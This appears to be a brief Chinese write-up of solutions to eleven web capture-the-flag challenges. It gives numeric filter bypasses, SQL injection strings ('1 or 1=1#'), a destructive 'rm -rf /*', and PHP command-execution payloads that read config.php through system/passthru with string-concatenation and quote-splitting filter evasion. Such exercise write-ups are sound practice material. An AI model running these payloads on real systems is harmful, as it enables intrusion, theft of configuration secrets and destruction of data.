web1
十六进制 0x38e
web2
异或 200^800
按位与 992|8
web3
加减乘除都可以
--1000 负负得正
web4
id=1 or 1=1#
id=id#
上面是显示所有的数据,flag自然也会在里面
‘1000’ MySQL会自动转换类型
web5
异或 144^888
web6
取反 ~~1000
web7
二进制 0b1111101000
web8
rm -rf /*
删库跑路??
web9
可以直接执行命令
system('cat config.php');
web10
用其他的函数就可以 passthru('cat config.php');
拼接system $a='sys';$b='tem';$c=$a.$b;$c('cat config');
web11
拼接 $a='c';$b='at';$c=$a.$b;passthru("$c config.php");
单双引号 passthru("ca''t config.php");
本文介绍了一系列Web安全相关的技巧,包括十六进制转换、位运算操作、SQL注入方法及利用命令执行漏洞的多种手段。通过具体示例展示了如何进行安全测试和潜在攻击路径。

1922

被折叠的 条评论
为什么被折叠?



